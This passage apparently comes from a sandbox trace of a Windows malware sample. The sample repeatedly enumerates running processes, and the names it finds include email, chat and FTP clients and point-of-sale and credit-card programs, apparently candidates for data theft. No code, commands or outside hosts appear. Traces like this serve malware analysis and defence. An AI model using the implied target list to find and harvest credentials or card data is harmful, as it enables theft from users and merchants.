| out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0214.681] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0214.683] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0214.685] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0214.687] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0214.689] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0214.691] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0214.693] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0214.694] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0214.696] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0214.699] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0214.701] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0214.702] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0214.704] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0214.706] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0214.708] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0214.711] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0214.712] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0214.717] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0214.719] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0214.721] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0214.723] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0214.725] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0214.727] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0214.729] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0214.731] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0214.733] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0214.735] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0214.740] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0214.742] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0214.744] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0214.745] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.747] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.749] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0214.750] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.752] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.754] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0214.755] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0214.825] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0214.826] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.858] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0214.860] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0214.861] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0214.863] CloseHandle (hObject=0x1eb8) returned 1 [0214.863] Sleep (dwMilliseconds=0x64) [0214.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0214.926] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.927] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.929] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.930] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.932] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.934] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.936] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.938] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.982] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.983] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.985] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.986] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.988] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.989] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.991] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.993] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.994] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.996] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.997] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.999] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.000] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0215.002] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.003] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0215.005] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.006] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0215.008] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0215.010] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0215.011] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0215.013] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.015] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0215.058] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.060] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.062] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0215.063] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.065] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0215.067] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.069] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0215.070] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0215.072] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, 